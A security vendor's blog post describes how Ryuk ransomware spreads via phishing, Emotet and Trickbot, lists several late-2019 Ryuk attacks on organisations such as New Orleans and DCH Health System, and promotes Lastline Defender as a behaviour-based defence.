Ryuk: Defending Against This Increasingly Busy Ransomware Family

Ryuk: Defending Against This Increasingly Busy Ransomware Family

On December 16, 2019, the U.S. Coast Guard disclosed a security incident at a facility regulated by the Maritime Transportation Security Act (MTSA). Forensic analysis suggests that the incident might have begun when an employee clicked on a link embedded in a phishing email. This action enabled a threat actor to set Ryuk ransomware loose on the facility’s network. Ultimately, the infection spread to all IT network files, leading Ryuk to disrupt the corporate IT network and prevent critical process control monitoring systems from functioning properly.

The incident at the MTSA-regulated facility is just one of the latest attacks to involve Ryuk. Given the crypto-malware’s growing threat activity, I’ll use this blog to explain how Ryuk works. I’ll then look at some other recent infections involving this ransomware before exploring how Lastline’s network detection and response solution can defend against a Ryuk attack.

Some Background Information on Ryuk

Phishing is one of the primary infection vectors for most ransomware families. The same goes for Ryuk. But there’s an interesting twist with this particular family.

As noted by Malwarebytes, a typical Ryuk attack begins when a user opens a weaponized Microsoft Office document attached to a phishing email. Opening the document causes a malicious macro to execute a PowerShell command that attempts to download Emotet. Emotet, a banking trojan with the ability to download additional malware onto an infected machine, retrieves and executes Trickbot. This secondary payload, in turn, collects admin credentials, allowing digital attackers to move laterally to critical assets connected to the network. The attack chain concludes when the attackers execute Ryuk on each of these assets.

It’s never good for ransomware victims to not have a data backup that they can use to recover their data. In the case of Ryuk, it’s especially bad. McAfee reported in February 2019 that the typical Ryuk ransom demands amounted to $145,000—more than 10 times the average ransomware amount. Ryuk’s handlers were sometimes willing to negotiate; even then, the average ransom amount post-negotiation was still as high as $71,000.

Recent Attacks Involving Ryuk Ransomware

The security community documented numerous Ryuk attacks in 2019. Even so, the ransomware had a particularly busy final quarter. Here are just some of the infections that made headlines during this three-month period.

  • National Veterinary Associates: In mid-November, KrebsOnSecurity revealed that National Veterinary Associates had suffered a Ryuk ransomware infection. The attack limited the availability of patient records, payment systems and practice management software at 400 veterinaries operated by the California company. In response to the infection, NVA hired two outside security firms to assist in its recovery effort.
  • Virtual Care Provider Inc.: Less than a week later, KrebsOnSecurity reported another Ryuk attack. This incident involved Virtual Care Provider Inc. (VCPI), a Wisconsin-based IT company that provides data hosting and other IT services to over 100 nursing homes located in the United States. As a result of the attack, these medical facilities were temporarily unable to access their patients’ medical records.
  • Louisiana State Government: Around that same time, ArsTechnica covered a Ryuk attack that forced Louisiana’s Office of Technology Services to shut down parts of the state government’s network. It took this measure to prevent the ransomware from spreading to other state agencies. The governor’s office and the Department of Health were among the departments affected by the shutdown and ransomware attack.
  • Prosegur: Near the end of November, news emerged of how Spanish multinational cash logistics company had temporarily shut down its IT network following a Ryuk attack. The company confirmed on Twitter that it had experienced a “security information incident in its telecommunications platforms.” Not long afterward, Prosegur revealed that it had taken “maximum security measures” to prevent Ryuk from spreading.
  • The City of New Orleans: On December 13, 2019, the City of New Orleans declared a state of emergency after suffering a ransomware attack. One day later, Bleeping Computer learned of a memory dump that contained numerous references to both Ryuk and New Orleans, including domain names and file shares. These resources suggest there was at least some connection between Ryuk and the New Orleans ransomware attack.
  • DCH Health System: Near the end of December, Advance Local revealed that four patients had filed a class action lawsuit against DCH Health System. Their lawsuit alleged that the hospital had violated HIPAA and endangered their medical care in relation to a Ryuk ransomware attack that occurred three months earlier. That infection disrupted DCH’s operations for 10 days, according to Advance Local.

How to Defend Against Ryuk Ransomware

Organizations can’t rely on simply paying the ransom following a Ryuk ransomware infection. First, many organizations can’t afford to pay these ransoms without closing their doors, as demands oftentimes amount to hundreds of thousands if not millions of dollars. Second, there’s no guarantee that victims will recover their files even if they do pay. As reported by Emsisoft, for instance, one decryptor provided by Ryuk’s handlers contained a bug that could have prevented victims from restoring large files affected by the ransomware.

These facts, when coupled with the growing rate of ransomware evasion, highlights the need for organizations to invest in a solution like Lastline Defender. This security solution is capable of detecting ransomware and malware across all platforms because it doesn’t just look at a suspicious program. Lastline Defender uses supervised and unsupervised machine learning to look for a litany of tell-tale signs that a malware infection has taken place. It then stitches these signs together to build a comprehensive picture of what a program does, and it uses this picture to categorize or score the program’s potentially malicious nature.

Since Lastline Defender relies on behavior-based detection, it doesn’t matter if it’s never seen a sample of Ryuk. It also doesn’t matter if a malware family is polymorphic and thus constantly creating slightly different variants. If it behaves like malware or ransomware, Lastline will detect it.

Use Lastline Defender to strengthen your organization’s defenses against Ryuk and other ransomware families.

 

This article recently appeared in InfoSecurity.

Richard Henderson

Richard Henderson

Richard Henderson is Head of Global Threat Intelligence, where he is responsible for trend-spotting, industry-watching, and evangelizing the unique capabilities of Lastline’s technologies. He has nearly two decades of experience and involvement in the global hacker community and discovers new trends and activities in the cyber-underground. He is a researcher and regular presenter at conferences and events and was lauded by a former US DHS undersecretary for cybersecurity as having an “insightful view” on the current state of cybersecurity. Richard was one of the first researchers in the world to defeat Apple’s TouchID fingerprint sensor on the iPhone 5S. He has taught courses on radio interception techniques multiple times at the DEFCON hacker conference. Richard is a regular writer and contributor to many publications including BankInfoSecurity, Forbes, Dark Reading, and CSO.
Richard Henderson